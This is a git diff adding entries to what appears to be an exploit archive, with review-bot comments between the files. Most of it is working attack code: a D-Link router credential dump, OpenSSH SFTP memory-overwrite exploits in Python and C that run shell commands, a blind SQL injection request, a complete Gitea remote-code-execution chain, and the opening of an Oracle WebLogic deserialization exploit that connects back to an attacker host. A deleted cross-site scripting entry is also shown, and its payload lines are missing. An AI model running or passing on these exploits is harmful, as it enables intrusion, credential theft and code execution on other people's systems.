diff --git a/exploits/hardware/webapps/45002.py b/exploits/hardware/webapps/45002.py
new file mode 100755
index 000000000..1b96bd294
--- /dev/null
+++ b/exploits/hardware/webapps/45002.py
@@ -0,0 +1,121 @@
+# Exploit title: D-Link DIR601 2.02NA - Credential disclosure
+# Date: 2018-07-10
+# Exploit Author: Richard Rogerson
+# Vendor Homepage: http://ca.dlink.com/
+# Software Link: http://support.dlink.ca/ProductInfo.aspx?m=DIR-601
+# Version: <= 2.02NA
+# Tested on: D-Link DIR601 Firmware 2.02NA
+# Contact: http://twitter.com/pktlabs
+# Website: https://www.packetlabs.net
+# CVE: N/A
+# Category: Webapps, Remote
+
+
+# 1. Description:
+# Through analyzing the Captcha function implemented in the DIR-601 (2.02NA firmware),
+# a HTTP request was found responsible for the handoff to client-side code.
+# Inspecting the HTTP requests, it was identified that a parameter named ‘table_name’
+# is used to instruct the back-end application which content to return. By abusing this
+# request, it was found possible to retrieve sensitive information relating to the device
+# configuration and administrative credentials.
+
+# It is possible to modify the HTTP POST to my_cgi.cgi and include as table_name references
+# to retrieve the administrative credentials, wireless ssid, and pre-shared key where
+# applicable. Enumerating the naming conventions within the client-side code, it was
+# determined that a number of potentially sensitive parameters/tables exist in the
+# back-end environment which provide significant value if retrieved, four of these include:
+
+# - Admin_user
+# - Wireless_settings
+# - Wireless_security
+# - Wireless_wpa_settings
+
+Sample of the vulnerable POST request:
+
+HTTP Request
+POST /my_cgi.cgi HTTP/1.1
+Host: 192.168.0.1
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Referer: http://192.168.0.1/login_real.htm
+Content-Length: 86
+Connection: close
+Pragma: no-cache
+Cache-Control: no-cache
+
+request=no_auth&request=load_settings&table_name=create_auth_pic&table_name=admin_user <- additional table requested
+
+Sample response:
+
+HTTP Response
+HTTP/1.1 200 OK
+Content-type: text/xml
+Connection: close
+Date: Sat, 01 Jan 2011 00:57:12 GMT
+Server: lighttpd/1.4.28
+Content-Length: 228
+
+150649adminclear-text-password1
+
+
+# 2. Exploit Code:
+
+#!/usr/bin/python
+import socket,sys,urllib,urllib2
+import xml.etree.ElementTree as ET
+
+print """Packetlabs
+====================================
+D-Link DIR-601 Authorization Bypass
+"""
+if len(sys.argv) != 2:
+ print "usage:",sys.argv[0],""
+ sys.exit()
+else:
+ ipaddr=sys.argv[1]
+ print "Retrieving admin username, password and wireless security configuration from",ipaddr
+
+# build URL
+url = 'http://'
+url+= ipaddr
+url+='/my_cgi.cgi'
+data = "request=no_auth&request=load_settings&table_name=admin_user&table_name=user_user&table_name=wireless_settings&table_name=wireless_security&table_name=wireless_wpa_settings"
+
+# send payload
+req = urllib2.Request(url, data)
+response = urllib2.urlopen(req)
+print "Sending payload to:",response.geturl()
+retr = response.read()
+root = ET.fromstring(retr)
+
+# credential dump
+print "\r\nAdmin Creds"
+print "username:",root[0][0].text
+print "password:",root[0][1].text
+
+# dump wireless settings
+print "\r\nWireless Settings"
+sectype=int(root[3][0].text)
+ssid=root[2][2].text
+enctype="none"
+
+print "SSID is:", ssid
+if sectype == 2:
+ enctype="WPA2"
+ key=root[4][3].text
+elif sectype == 1:
+ enctype="WEP("
+ keylength=int(root[3][3].text)
+ if keylength == 5:
+ enctype+="64bit)"
+ key=root[3][5].text
+ elif keylength == 13:
+ enctype+="128bit)"
+ key=root[3][9].text
+ else:
+ key="Error, please inspect xml manually above, keylength=",keylength
+ print retr
+elif sectype == 0:
+ print "Wireless network is open?"
+ sys.exit()
+
+print enctype,"key is:",key
\ No newline at end of file
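Review bot: The header block (from `# Exploit title` through `# 1. Description`) records `CVE: N/A` and `Version: <= 2.02NA` but gives no remediation or detection guidance, so a device owner has no next step; 44996.py, 44997.txt and 44999.txt in this commit have the same gap. I would add a short section after the description, for example `# 3. Mitigation: keep the management interface unreachable from untrusted networks, install vendor firmware newer than 2.02NA if one exists, and change the admin password and wireless key on any unit that was exposed.` For detection, the sample request and the script's `data` string both show the distinguishing trait: a POST to `/my_cgi.cgi` carrying `request=no_auth` together with `table_name` values other than `create_auth_pic`. The sample response line after `Content-Length: 228` also appears to have lost its XML markup, so the entry no longer shows that the password is returned in clear text.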
diff --git a/exploits/linux/remote/45001.py b/exploits/linux/remote/45001.py
new file mode 100755
index 000000000..71ed3935a
--- /dev/null
+++ b/exploits/linux/remote/45001.py
@@ -0,0 +1,114 @@
+# OpenSSH <= 6.6 SFTP misconfiguration exploit for 32/64bit Linux
+# The original discovery by Jann Horn: http://seclists.org/fulldisclosure/2014/Oct/35
+#
+# Adam Simuntis :: https://twitter.com/adamsimuntis
+# Mindaugas Slusnys :: https://twitter.com/mislusnys
+
+import paramiko
+import sys
+import time
+from pwn import *
+
+# parameters
+cmd = 'touch /tmp/pwn; touch /tmp/pwn2'
+host = '172.16.15.59'
+port = 22
+username = 'secforce'
+password = 'secforce'
+
+# connection
+ssh = paramiko.SSHClient()
+ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
+ssh.connect(hostname = host, port = port, username = username, password = password)
+sftp = ssh.open_sftp()
+
+# parse /proc/self/maps to get addresses
+log.info("Analysing /proc/self/maps on remote system")
+sftp.get('/proc/self/maps','maps')
+with open("maps","r") as f:
+ lines = f.readlines()
+ for line in lines:
+ words = line.split()
+ addr = words[0]
+ if ("libc" in line and "r-xp" in line):
+ path = words[-1]
+ addr = addr.split('-')
+ BITS = 64 if len(addr[0]) > 8 else 32
+ print "[+] {}bit libc mapped @ {}-{}, path: {}".format(BITS, addr[0], addr[1], path)
+ libc_base = int(addr[0], 16)
+ libc_path = path
+ if ("[stack]" in line):
+ addr = addr.split("-")
+ saddr_start = int(addr[0], 16)
+ saddr_end = int(addr[1], 16)
+ print "[+] Stack mapped @ {}-{}".format(addr[0], addr[1])
+
+# download remote libc and extract information
+print "[+] Fetching libc from remote system..\n"
+sftp.get(str(libc_path), 'libc.so')
+e = ELF("libc.so")
+sys_addr = libc_base + e.symbols['system']
+exit_addr = libc_base + e.symbols['exit']
+
+# gadgets for the RET slide and system()
+if BITS == 64:
+ pop_rdi_ret = libc_base + next(e.search('\x5f\xc3'))
+ ret_addr = pop_rdi_ret + 1
+else:
+ ret_addr = libc_base + next(e.search('\xc3'))
+
+print "\n[+] system() @ {}".format(hex(sys_addr))
+print "[+] 'ret' @ {}".format(hex(ret_addr))
+if BITS == 64:
+ print "[+] 'pop rdi; ret' @ {}\n".format(hex(pop_rdi_ret))
+
+with sftp.open('/proc/self/mem','rw') as f:
+ if f.writable():
+ print "[+] We have r/w permissions for /proc/self/mem! All Good."
+ else:
+ print "[-] Fatal error. No r/w permission for mem."
+ sys.exit(0)
+
+ log.info("Patching /proc/self/mem on the remote system")
+
+ stack_size = saddr_end - saddr_start
+ new_stack = ""
+
+ print "[+] Pushing new stack to {}.. fingers crossed ;))".format(hex(saddr_start))
+ #sleep(20)
+ if BITS == 32:
+ new_stack += p32(ret_addr) * (stack_size/4)
+ new_stack = cmd + "\x00" + new_stack[len(cmd)+1:-12]
+ new_stack += p32(sys_addr)
+ new_stack += p32(exit_addr)
+ new_stack += p32(saddr_start)
+ else:
+ new_stack += p64(ret_addr) * (stack_size/8)
+ new_stack = cmd + "\x00" + new_stack[len(cmd)+1:-32]
+ new_stack += p64(pop_rdi_ret)
+ new_stack += p64(saddr_start)
+ new_stack += p64(sys_addr)
+ new_stack += p64(exit_addr)
+
+ # debug info
+ with open("fake_stack","w") as lg:
+ lg.write(new_stack)
+
+ # write cmd to top off the stack
+ f.seek(saddr_start)
+ f.write(cmd + "\x00")
+
+ # write the rest from bottom up, we're going to crash at some point
+ for off in range(stack_size - 32000, 0, -32000):
+ cur_addr = saddr_start + off
+
+ try:
+ f.seek(cur_addr)
+ f.write(new_stack[off:off+32000])
+ except:
+ print "Stack write failed - that's probably good!"
+ print "Check if you command was executed..."
+ sys.exit(0)
+
+sftp.close()
+ssh.close()
\ No newline at end of file
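Review bot: The header comment calls this an "SFTP misconfiguration" without saying which configuration is affected or what fixes it, and 45000.c in this commit carries no description at all. Going by the linked advisory, the precondition is an SFTP-only account that can still reach procfs, so I would add a comment such as `# Affected: SFTP-only accounts (e.g. ForceCommand internal-sftp) without ChrootDirectory on Linux; OpenSSH 6.7 makes sftp-server block access to /proc/self/{mem,maps}.` Separately, `paramiko.AutoAddPolicy()` together with the hard-coded `username`/`password` under `# parameters` means the password is sent to whatever answers on `host` with no host-key check. A comment marking those values as lab placeholders would make that explicit.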
diff --git a/exploits/linux/webapps/44970.txt b/exploits/linux/webapps/44970.txt
deleted file mode 100644
index a7ecf13d6..000000000
--- a/exploits/linux/webapps/44970.txt
+++ /dev/null
@@ -1,20 +0,0 @@
-# Exploit Title: ModSecurity 3.0.0 - Cross-Site Scripting
-# Date: 2018-07-02
-# Vendor Homepage: https://www.modsecurity.org
-# Software: ModSecurity
-# Category: Web Application Firewall
-# Exploit Author: Adipta Basu
-# Tested on: Mac OS High Sierra
-# CVE: N/A
-# Description: ModSecurity 3.0.0 has XSS via an onError attribute of an IMG element
-
-# Details:
-# After doing source code analysis, I found that if
-# is passed as a parameter, a pop-up is obtained. This is because the filter flags
-# terms like "script","alert",etc. Moreover it also flags if there is a string placed
-# inside the first bracket. That is why I had to use 111. However document.cookie when
-# passed works fine.
-
-Reproduction Steps:
-
- - Use
or
\ No newline at end of file
diff --git a/exploits/linux/webapps/44999.txt b/exploits/linux/webapps/44999.txt
new file mode 100644
index 000000000..6f0845758
--- /dev/null
+++ b/exploits/linux/webapps/44999.txt
@@ -0,0 +1,57 @@
+# Title: Elektronischer Leitz-Ordner 10 - SQL Injection
+# Author: Jens Regel, Schneider & Wulf EDV-Beratung GmbH & Co. KG
+# Software: https://www.elo.com/en-de/
+# CVE: N/A
+# Affected Products:
+# ELOenterprise 10 (ELO Access Manager <= 10.17.120)
+# ELOenterprise 9 (ELO Access Manager <= 9.17.120)
+# ELOprofessional 10 (ELO Access Manager <= 10.17.120)
+# ELOprofessional 9 (ELO Access Manager <= 9.17.120)
+
+
+
+# Description:
+# ELO is a commercial software product for managing documents and
+# electronic content. Storage and organization is similar to classic
+# paper-based document management. ELO belongs to the category of document
+# management (DMS) and enterprise content management systems (ECM). DMS
+# and ECM systems enable audit-proof archiving of documents and
+# information requiring storage.
+
+# We have discovered a time-based blind SQL injection vulnerability in the
+# ELO Access Manager (<= 9.17.120 and <= 10.17.120) component that makes
+# it possible to read all database content. The vulnerability exists in
+# the HTTP GET parameter "ticket". For example, we succeeded in reading
+# the password hash of the administrator user in the "userdata" table from
+# the "eloam" database.
+
+# Proof of Concept:
+
+GET
+/wf-NAME/social/api/feed/aggregation/201803310000?ticket=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'
+IF(UNICODE(SUBSTRING((SELECT TOP 1 ISNULL(CAST(name AS
+NVARCHAR(4000)),CHAR(32)) FROM master..sysdatabases WHERE name NOT IN
+(SELECT TOP 7 name FROM master..sysdatabases ORDER BY name) ORDER BY
+name),5,1))>104) WAITFOR DELAY '0:0:1'--
+qvAV&after=1523013041889&lang=de&_dc=1523013101769 HTTP/1.1
+Accept-Encoding: gzip,deflate
+Connection: close
+Accept: */*
+Host: server:9090
+Referer: http://server:9090/wf-NAME/social/api/feed/aggregation/201803310000
+Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv: 59.0) Gecko/20100101
+Firefox/59.0
+
+HTTP/1.1 401 Unauthorized
+Server: Apache-Coyote/1.1
+Content-Type: application/json;charset=UTF-8
+Content-Length: 410
+Date: Fri, 06 Apr 2018 11:57:15 GMT
+Connection: close
+
+{"error":{"code":401,"message":"[TICKET:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\u0027
+IF(UNICODE(SUBSTRING((SELECT TOP 1 ISNULL(CAST(name AS
+NVARCHAR(4000)),CHAR(32)) FROM master..sysdatabases WHERE name NOT IN
+(SELECT TOP 7 name FROM master..sysdatabases ORDER BY name) ORDER BY
+name),5,1))\u003e104) WAITFOR DELAY \u00270][ELOIX:2001]Sitzungskennung
+ung..ltig oder abgelaufen. Melden Sie sich neu an.[NO-DETAILS]"}}
\ No newline at end of file
diff --git a/exploits/linux_x86-64/remote/45000.c b/exploits/linux_x86-64/remote/45000.c
new file mode 100644
index 000000000..f02d18937
--- /dev/null
+++ b/exploits/linux_x86-64/remote/45000.c
@@ -0,0 +1,196 @@
+#define _GNU_SOURCE
+
+// THIS PROGRAM IS NOT DESIGNED TO BE SAFE AGAINST VICTIM MACHINES THAT
+// TRY TO ATTACK BACK, THE CODE IS SLOPPY!
+// (In other words, please don't use this against other people's machines.)
+
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+#define min(a,b) (((a)<(b))?(a):(b))
+
+sftp_session sftp;
+
+size_t grab_file(char *rpath, char **out) {
+ size_t allocated = 4000, used = 0;
+ *out = calloc(1, allocated+1);
+ sftp_file f = sftp_open(sftp, rpath, O_RDONLY, 0);
+ if (f == NULL) fprintf(stderr, "Error opening remote file %s: %s\n", rpath, ssh_get_error(sftp)), exit(1);
+ while (1) {
+ ssize_t nbytes = sftp_read(f, *out+used, allocated-used);
+ if (nbytes < 0) fprintf(stderr, "Error reading remote file %s: %s\n", rpath, ssh_get_error(sftp)), exit(1);
+ if (nbytes == 0) {
+ (*out)[used] = '\0';
+ sftp_close(f);
+ return used;
+ }
+ used += nbytes;
+ if (used == allocated) {
+ allocated *= 4;
+ *out = realloc(*out, allocated);
+ }
+ }
+}
+
+void dump_file(char *name, void *buf, size_t len) {
+ FILE *f = fopen(name, "w+");
+ if (!f) perror("can't write to local file"), exit(1);
+ if (fwrite(buf, 1, len, f) != len) fprintf(stderr, "local write failed\n"), exit(1);
+ if (fclose(f)) fprintf(stderr, "fclose error\n"), exit(1);
+}
+
+size_t slurp_file(char *path, char **out) {
+ size_t allocated = 4000, used = 0;
+ *out = calloc(1, allocated+1);
+ FILE *f = fopen(path, "r");
+ if (f == NULL) perror("opening local file failed"), exit(1);
+ while (1) {
+ ssize_t nbytes = fread(*out+used, 1, allocated-used, f);
+ if (nbytes < 0) fprintf(stderr, "Error reading local file %s: %s\n", path, strerror(errno)), exit(1);
+ if (nbytes == 0) {
+ (*out)[used] = '\0';
+ if (fclose(f)) fprintf(stderr, "fclose error\n"), exit(1);
+ return used;
+ }
+ used += nbytes;
+ if (used == allocated) {
+ allocated *= 4;
+ *out = realloc(*out, allocated);
+ }
+ }
+}
+
+int main(int argc, char **argv) {
+ if (argc != 4) fprintf(stderr, "invocation: ./exploit host user 'shell commands here'\n"), exit(1);
+ char *target_host = argv[1];
+ char *target_user = argv[2];
+ char *shell_commands = argv[3];
+
+ ssh_session my_ssh_session;
+ int rc;
+ char *password;
+ // Open session and set options
+ my_ssh_session = ssh_new();
+ if (my_ssh_session == NULL) exit(-1);
+ ssh_options_set(my_ssh_session, SSH_OPTIONS_HOST, target_host);
+ ssh_options_set(my_ssh_session, SSH_OPTIONS_USER, target_user);
+ // Connect to server
+ rc = ssh_connect(my_ssh_session);
+ if (rc != SSH_OK) fprintf(stderr, "Error connecting to host: %s\n", ssh_get_error(my_ssh_session)), exit(-1);
+
+ // Authenticate ourselves
+ password = getpass("Password: ");
+ rc = ssh_userauth_password(my_ssh_session, NULL, password);
+ if (rc != SSH_AUTH_SUCCESS)
+ fprintf(stderr, "Error authenticating with password: %s\n", ssh_get_error(my_ssh_session)), exit(-1);
+
+ sftp = sftp_new(my_ssh_session);
+ if (sftp == NULL) fprintf(stderr, "Error allocating SFTP session: %s\n", ssh_get_error(my_ssh_session)), exit(-1);
+
+ rc = sftp_init(sftp);
+ if (rc != SSH_OK) {
+ fprintf(stderr, "Error initializing SFTP session: %s.\n", ssh_get_error(sftp));
+ sftp_free(sftp);
+ return rc;
+ }
+
+ char *mappings;
+ grab_file("/proc/self/maps", &mappings);
+ //printf("/proc/self/maps dump: \n%s\n\n\n", mappings);
+
+ printf("got /proc/self/maps. looking for libc...\n");
+ // 7fc9e742b000-7fc9e75ad000 r-xp 00000000 fe:00 2753466 /lib/x86_64-linux-gnu/libc-2.13.so
+ long long start_addr, end_addr, offset;
+ char *libc_path = NULL;
+ long long stack_start_addr = 0, stack_end_addr;
+ for (char *p = strtok(mappings, "\n"); p; p = strtok(NULL, "\n")) {
+ if (strstr(p, " r-xp ") && strstr(p, "/libc-")) {
+ if (libc_path) fprintf(stderr, "warning: two times libc?\n");
+ printf("mapping line: %s\n", p);
+ if (sscanf(p, "%Lx-%Lx %*4c %Lx", &start_addr, &end_addr, &offset) != 3) perror("scanf failed"), exit(1);
+ libc_path = strdup(strchr(p, '/'));
+ if (libc_path == NULL) fprintf(stderr, "no path in mapping?"), exit(1);
+ }
+ if (strstr(p, "[stack]")) {
+ if (stack_start_addr != 0) fprintf(stderr, "two stacks? no."), exit(1);
+ printf("mapping line: %s\n", p);
+ if (sscanf(p, "%Lx-%Lx ", &stack_start_addr, &stack_end_addr) != 2) perror("scanf failed"), exit(1);
+ }
+ }
+ if (libc_path == NULL) fprintf(stderr, "unable to find libc\n"), exit(1);
+ if (stack_start_addr == 0) fprintf(stderr, "unable to find stack"), exit(1);
+ printf("remote libc is at %s\n", libc_path);
+ printf("offset %Lx from libc is mapped to %Lx-%Lx\n", offset, start_addr, end_addr);
+
+ char *libc;
+ size_t libc_size = grab_file(libc_path, &libc);
+ dump_file("libc.so", libc, libc_size);
+ printf("downloaded libc, size is %zu bytes\n", libc_size);
+
+ system("objdump -T libc.so | grep ' system$' | cut -d' ' -f1 > system.addr");
+ char *system_offset_str;
+ slurp_file("system.addr", &system_offset_str);
+ long long system_offset;
+ if (sscanf(system_offset_str, "%Lx", &system_offset) != 1) perror("scanf failed"), exit(1);
+ long long remote_system_addr = start_addr+system_offset-offset;
+ printf("remote system() function is at %Lx\n", remote_system_addr);
+
+ printf("looking for ROP gadget `pop rdi;ret` (0x5fc3) in libc...\n");
+ char *gadget = memmem(libc+offset, end_addr-start_addr, "\x5f\xc3", 2);
+ if (gadget == NULL) fprintf(stderr, "no gadget found :(\n"), exit(1);
+ long long gadget_address = start_addr + (gadget-(libc+offset));
+ long long ret_address = gadget_address+1;
+ printf("found gadget at %Lx\n", gadget_address);
+
+ printf("remote stack is at %Lx-%Lx\n", stack_start_addr, stack_end_addr);
+ printf("doing it the quick-and-dirty way (that means: pray that the target"
+ "program was compiled with gcc, giving us 16-byte stack alignment)...\n");
+ long long stack_len = stack_end_addr - stack_start_addr;
+ /*if (stack_len > 32000) {
+ stack_len = 32000;
+ stack_start_addr = stack_end_addr - stack_len;
+ }*/
+ char *new_stack = malloc(stack_len);
+
+ // first fill it with our ret slide
+ for (long long *s = (void*)new_stack; s<(long long*)(new_stack+stack_len); s++) {
+ *s = ret_address;
+ }
+
+ // put some shell commands in the head
+ strcpy(new_stack, shell_commands);
+
+ // put the mini-ROP-chain at the end
+ // [address of pop rdi] [stack head] [address of system]
+ long long *se = (void*)(new_stack + stack_len);
+ se[-3] = gadget_address;
+ se[-2] = stack_start_addr;
+ se[-1] = remote_system_addr;
+
+ printf("Prepared the new stack. Now comes the moment of truth: push the new stack over and pray.\n");
+ sftp_file mem = sftp_open(sftp, "/proc/self/mem", O_RDWR, 0);
+ if (mem == NULL) fprintf(stderr, "Error opening remote memory: %s\n", ssh_get_error(sftp)), exit(1);
+
+ // first send over the string
+ rc = sftp_seek64(mem, stack_start_addr);
+ if (rc) fprintf(stderr, "Error seeking to remote stack: %s\n", ssh_get_error(sftp)), exit(1);
+ ssize_t mem_written = sftp_write(mem, new_stack, strlen(shell_commands)+1);
+ if (mem_written != strlen(shell_commands)+1) fprintf(stderr, "didn't write the whole new stack\n");
+
+ // now send over the rest right-to-left
+ for (long long off = stack_len-32000; off >= 0; off -= 32000) {
+ rc = sftp_seek64(mem, stack_start_addr+off);
+ if (rc) fprintf(stderr, "Error seeking: %s\n", ssh_get_error(sftp)), exit(1);
+ mem_written = sftp_write(mem, new_stack+off, 32000);
+ if (mem_written != 32000) fprintf(stderr, "stack write failed – that's probably good :)\n"), exit(0);
+ }
+
+ return 0;
+}
\ No newline at end of file
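Review bot: In `slurp_file`, the error check `if (nbytes < 0)` after `ssize_t nbytes = fread(...)` can never fire, because `fread` returns a `size_t` count and signals failure only through `ferror()`. A failed local read is therefore treated as end of file and the caller parses whatever partial text is in the buffer. The check should read `if (nbytes == 0 && ferror(f)) fprintf(stderr, "Error reading local file %s\n", path), exit(1);`. The `realloc` results in `grab_file` and `slurp_file` and the `malloc(stack_len)` in `main` are also used without a NULL check. The warning at the top of the file about hostile peers applies concretely to `system("objdump -T libc.so ...")`, which runs local tooling on a file supplied by the remote side, and that deserves a comment at the call.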
diff --git a/exploits/multiple/webapps/44996.py b/exploits/multiple/webapps/44996.py
new file mode 100755
index 000000000..d52d512a7
--- /dev/null
+++ b/exploits/multiple/webapps/44996.py
@@ -0,0 +1,200 @@
+# pip install PyJWT requests
+# pip install dulwich==0.19.0
+from requests import Request, Session, get, post
+import jwt
+import time
+import base64
+import os
+import re
+import time
+import threading
+import random
+import string
+import urlparse
+import urllib
+from dulwich import porcelain
+
+print "Gitea 1.4.0"
+print "Unauthenticated Remote Code Execution"
+print "by Kacper Szurek"
+print "https://security.szurek.pl/"
+print "https://twitter.com/KacperSzurek"
+print "https://www.youtube.com/c/KacperSzurek"
+
+def decode_base64(data):
+ missing_padding = len(data) % 4
+ if missing_padding != 0:
+ data += '='* (4 - missing_padding)
+ return base64.urlsafe_b64decode(data)
+
+def get_random():
+ return ''.join(random.choice(string.lowercase) for x in range(6))
+
+def get_csrf(path):
+ temp = s.get("{}{}".format(url, path))
+
+ content = temp.text.encode("utf-8")
+
+ csrf = re.search('name="_csrf" content="([^"]+)"', content)
+
+ if not csrf:
+ print "[-] Cannot get CSRF token"
+ os._exit(0)
+
+ return csrf.group(1)
+
+command = "whoami"
+url = 'http://192.168.1.103:3000/'
+session_value = '11session'
+
+r = get('{}api/v1/repos/search?limit=1'.format(url))
+try:
+ out = r.json()['data']
+except:
+ print "[-] Probably not gitea url"
+ os._exit(0)
+
+if len(out) != 1:
+ print "[-] There is no public repos"
+ os._exit(0)
+
+out = out[0]
+
+public_repo_id = int(out['id'])
+public_user_id = int(out['owner']['id'])
+public_repo_url = out['full_name']
+
+print "[+] Found public repo {} ID {}".format(public_repo_url, public_repo_id)
+
+json = {
+ "Oid": "....custom/conf/app.ini",
+ "Size": 1000000, # This needs to be bigger than file
+ "User" : "a",
+ "Password" : "a",
+ "Repo" : "a",
+ "Authorization" : "a"
+}
+
+s = Session()
+
+r = s.post('{}{}.git/info/lfs/objects'.format(url, public_repo_url), json=json, headers={'Accept': 'application/vnd.git-lfs+json'})
+if '"Unauthorized"' not in r.text or '"expires_at"' not in r.text:
+ print "[-] Cannot create fake OID for app.ini"
+ os._exit(0)
+
+print "[+] Fake OID for app.ini created"
+
+r = get(r'{}{}.git/info/lfs/objects/....custom%2fconf%2fapp.ini/sth'.format(url, public_repo_url))
+
+if "RUN_USER" not in r.text:
+ print "[-] Cannot get app.ini"
+ os._exit(0)
+
+
+secret_match = re.search('LFS_JWT_SECRET *= *(.*?)[\r\n]', r.text)
+if not secret_match:
+ print "[-] Cannot find JWT secret in app.ini"
+ os._exit(0)
+
+jwt_secret = str(secret_match.group(1).strip())
+print "[+] Found secret: {}-".format(jwt_secret)
+jwt_secret = decode_base64(jwt_secret)
+
+# This needs to be INT, not STR
+current_time = int(time.time())-(60*60*24*1000)
+current_time2 = int(time.time())+(60*60*24*1000)
+token = jwt.encode({'user': public_user_id, 'repo': public_repo_id, 'op': 'upload', 'exp': current_time2, 'nbf': current_time}, jwt_secret, algorithm='HS256')
+
+print "[+] Generate jwt token for user {} and repo {}".format(public_user_id, public_repo_id)
+print token
+
+json['Oid'] = '....data/sessions/1/1/{}'.format(session_value)
+
+r = s.post('{}{}.git/info/lfs/objects'.format(url, public_repo_url), json=json, headers={'Accept': 'application/vnd.git-lfs+json'})
+if '"Unauthorized"' not in r.text or '"expires_at"' not in r.text:
+ print "[-] Cannot create fake OID for session"
+ os._exit(0)
+
+print "[+] Fake OID for session created"
+
+def race_condition_thread():
+ print "\n[+] Race condition thread started"
+ ts = Session()
+ req = Request('PUT', r'{}{}.git/info/lfs/objects/....data%2fsessions%2f1%2f1%2f{}'.format(url, public_repo_url, session_value) , data=open('session.tmp', "rb").read())
+ prepped = req.prepare()
+ # We need to set explicit big content length for race condition
+ prepped.headers['Content-Length'] = 150000
+ prepped.headers['Accept'] = 'application/vnd.git-lfs'
+ prepped.headers['Content-Type'] = 'application/vnd.git-lfs'
+ prepped.headers['Authorization'] = 'Bearer {}'.format(token)
+ # This will hang because of big Content-Length
+ response = ts.send(prepped)
+ print "\n[-] Race condition thread ended before exploit finish, try again"
+
+thread = threading.Thread(target=race_condition_thread, args=())
+thread.daemon = True
+thread.start()
+print "\n[+] Sleep 5 seconds"
+time.sleep(5)
+
+print "[+] Try using fake cookie: {}".format(session_value)
+
+s = Session()
+s.headers.update({'Cookie': 'i_like_gitea={}.tmp;'.format(session_value)})
+
+r = s.get('{}api/v1/user'.format(url))
+data = r.json()
+
+if not "id" in data or data['id'] != 1:
+ print "[-] Impersonation failed"
+ os._exit(0)
+
+user_name = data['login']
+user_id = data['id']
+
+print "[+] Login as {} ID {}".format(user_name, user_id)
+
+csrf = get_csrf('user/settings/applications')
+post_token = s.post('{}user/settings/applications'.format(url), data={'_csrf':csrf, 'name':get_random()}, allow_redirects=False)
+
+try:
+ login_token = post_token.cookies['macaron_flash']
+ login_token = dict(urlparse.parse_qsl(urllib.unquote(login_token)))
+ login_token = login_token['info']
+except:
+ print "[-] Cannot create token"
+ os._exit(0)
+
+print "[+] Login token: {}".format(login_token)
+
+csrf = get_csrf('repo/create')
+admin_repo_name = get_random()
+
+print "[+] Try create repo {}".format(admin_repo_name)
+
+repo_post = s.post("{}repo/create".format(url), data={'_csrf':csrf, 'uid':user_id, 'repo_name':admin_repo_name, 'readme': 'Default', 'auto_init':'on'}, allow_redirects=False)
+
+if repo_post.status_code != 302:
+ print "[-] Cannot create admin repo"
+ os._exit(0)
+
+csrf = get_csrf('{}/{}/settings/hooks/git/update'.format(user_name, admin_repo_name))
+hook_posts = s.post('{}{}/{}/settings/hooks/git/update'.format(url, user_name, admin_repo_name), data={'_csrf':csrf, 'content':"#!/bin/sh\n{}>objects/info/exploit".format(command)}, allow_redirects=False)
+
+if hook_posts.status_code != 302:
+ print "[-] Cannot updatehook"
+ os._exit(0)
+
+clone_url = '{}{}:{}@{}{}/{}.git'.format(url[0:7], login_token, "", url[7:], user_name, admin_repo_name)
+
+temp_repo_dir = get_random()
+r = porcelain.clone(clone_url, temp_repo_dir)
+porcelain.commit(r, get_random())
+porcelain.push(r, clone_url, "master")
+
+command_output = s.get('{}{}/{}/objects/info/exploit'.format(url, user_name, admin_repo_name))
+if command_output.status_code != 200:
+ print "[-] Cannot get exploit output"
+ os._exit(0)
+
+print command_output.text.encode("utf-8")
\ No newline at end of file
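Review bot: `print "[+] Found secret: {}-".format(jwt_secret)` and the bare `print token` a few lines later write the instance's LFS signing secret and a forged token to stdout, where they end up in terminal scrollback and engagement logs. The token's `nbf`/`exp` window is about 1000 days either side of now (`60*60*24*1000`). For an authorised test it is enough to report that the secret was readable, e.g. `print "[+] Found secret ({} chars)".format(len(jwt_secret))`, and to drop `print token`. The script also leaves artefacts on the target (an application token, a new repository and a modified `update` hook), so a header comment should list them and state that `LFS_JWT_SECRET` and the other secrets in `app.ini` must be rotated after testing.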
diff --git a/exploits/multiple/webapps/44998.py b/exploits/multiple/webapps/44998.py
new file mode 100755
index 000000000..49f9c3bf5
--- /dev/null
+++ b/exploits/multiple/webapps/44998.py
@@ -0,0 +1,146 @@
+#!/usr/bin/python
+# -*- coding: utf-8 -*-
+
+from argparse import RawTextHelpFormatter
+import socket, argparse, subprocess, ssl, os.path
+
+HELP_MESSAGE = '''
+--------------------------------------------------------------------------------------
+Developped by bobsecq: quentin.hardy@protonmail.com (quentin.hardy@bt.com)
+
+This script is the first public exploit/POC for:
+- Exploiting CVE-2017-3248 (Oracle WebLogic RMI Registry UnicastRef Object Java Deserialization Remote Code Execution)
+- Checking if a weblogic server is vulnerable
+
+This script needs the last version of Ysoserial (https://github.com/frohoff/ysoserial)
+
+Version affected (according to Oracle):
+- 10.3.6.0
+- 12.1.3.0
+- 12.2.1.0
+- 12.2.1.1
+--------------------------------------------------------------------------------------
+'''
+'''
+Tested on 12.1.2.0
+
+For technical information, see:
+- https://www.tenable.com/security/research/tra-2017-07
+- http://www.oracle.com/technetwork/security-advisory/cpujan2017-2881727.html
+
+Vulnerability identified by Jacob Baines (Tenable Network Security)
+but exploit/POC has not been published!
+'''
+
+#COMMANDS
+ARGS_YSO_GET_PAYLOD = "JRMPClient {0}:{1} |xxd -p| tr -d '\n'" #{0}: IP, {1}: port for connecting 'back' (i.e. attacker IP)
+CMD_GET_JRMPCLIENT_PAYLOAD = "java -jar {0} {1}"# {0} YSOSERIAL_PATH, {1}ARGS_YSO_GET_PAYLOD
+CMD_YSO_LISTEN = "java -cp {0} ysoserial.exploit.JRMPListener {1} {2} '{3}'"# {0} YSOSERIAL_PATH, {1}PORT, {2}payloadType, {3}command
+
+#PAYLOADS
+#A. Packet 1 to send:
+payload_1 = '74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'
+#B. Packet 2 to send:
+payload_2 = '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'
+#C. Packet 3 to send:
+#C.1 length
+payload_3_1 = "000003b3"
+#C.2 first part
+payload_3_2 = '056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000'
+#C.3.1 sub payload
